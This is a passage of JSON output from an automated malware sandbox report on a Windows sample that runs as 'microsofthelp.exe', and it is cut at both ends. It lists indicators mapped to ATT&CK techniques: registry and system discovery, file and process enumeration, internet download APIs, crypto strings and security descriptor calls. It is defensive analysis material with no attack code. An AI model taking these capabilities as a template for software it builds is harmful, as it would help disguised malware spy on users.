"https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"microsofthelp.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"Cr%atuProaes>\" (Indicator: \"aes\"; Source: \"00000000-00001432.00000000.76300.00160000.00000004.mdmp, 00000000-00001432.00000001.77907.00160000.00000004.mdmp\")\n Found string \"Cr%atuProaes>\" (Indicator: \"aes\"; Source: \"00000000-00005968.00000000.66608.002B0000.00000004.mdmp, 00000000-00005968.00000001.68534.002B0000.00000004.mdmp, 00000000-00005968.00000002.70456.002B0000.00000004.mdmp, 00000000-00005968.00000003.75889.002B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter HelpPane.exe (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"FindNextFileW\" with parameter hh.exe (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-118", "type": 2, "relevance": 1, "name": "Contains ability to query network adapter information (API string)", "description": "Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-115", "type": 2, "relevance": 3, "name": "Contains ability to retrieve data about the local computer (API string)", "description": "Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-82", "type": 2, "relevance": 1, "name": "Contains ability to retrieves the class object from a DLL object handler (API string)", "description": "Found reference to API \"p_DllGetClassObject\" (Indicator: \"DllGetClassObject\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"microsofthelp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-453", "type": 2, "relevance": 1, "name": "Contains ability to set options for internet handles (API string)", "description": "Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"se;.wsf;.ws\"\n Heuristic match: \":\\windo]s\\stub.kg\"\n Heuristic match: \"c:\\e^huqxvx.kg\"\n Heuristic match: \"sktop\\seftware.kg\"\n Heuristic match: \"microsoft.net\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"microsofthelp.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (UID: 00000000-00005968)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"SetSecurityDescriptorOwner\" (Indicator: \"SetSecurityDescriptorOwner\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CopySid\" (Indicator: \"CopySid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSecurityDescriptorControl\" (Indicator: \"GetSecurityDescriptorControl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetAclInformation\" (Indicator: \"GetAclInformation\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSidSubAuthority\" (Indicator: \"GetSidSubAuthority\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSecurityDescriptorGroup\" (Indicator: \"GetSecurityDescriptorGroup\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"MakeAbsoluteSD\" (Indicator: \"MakeAbsoluteSD\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSecurityDescriptorOwner\" (Indicator: \"GetSecurityDescriptorOwner\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"IsValidSid\" (Indicator: \"IsValidSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSecurityDescriptorDacl\" (Indicator: \"GetSecurityDescriptorDacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSecurityDescriptorSacl\" (Indicator: \"GetSecurityDescriptorSacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetLengthSid\" (Indicator: \"GetLengthSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InitializeSid\" (Indicator: \"InitializeSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"AddAce\" (Indicator: \"AddAce\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSidLengthRequired\" (Indicator: \"GetSidLengthRequired\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; File: 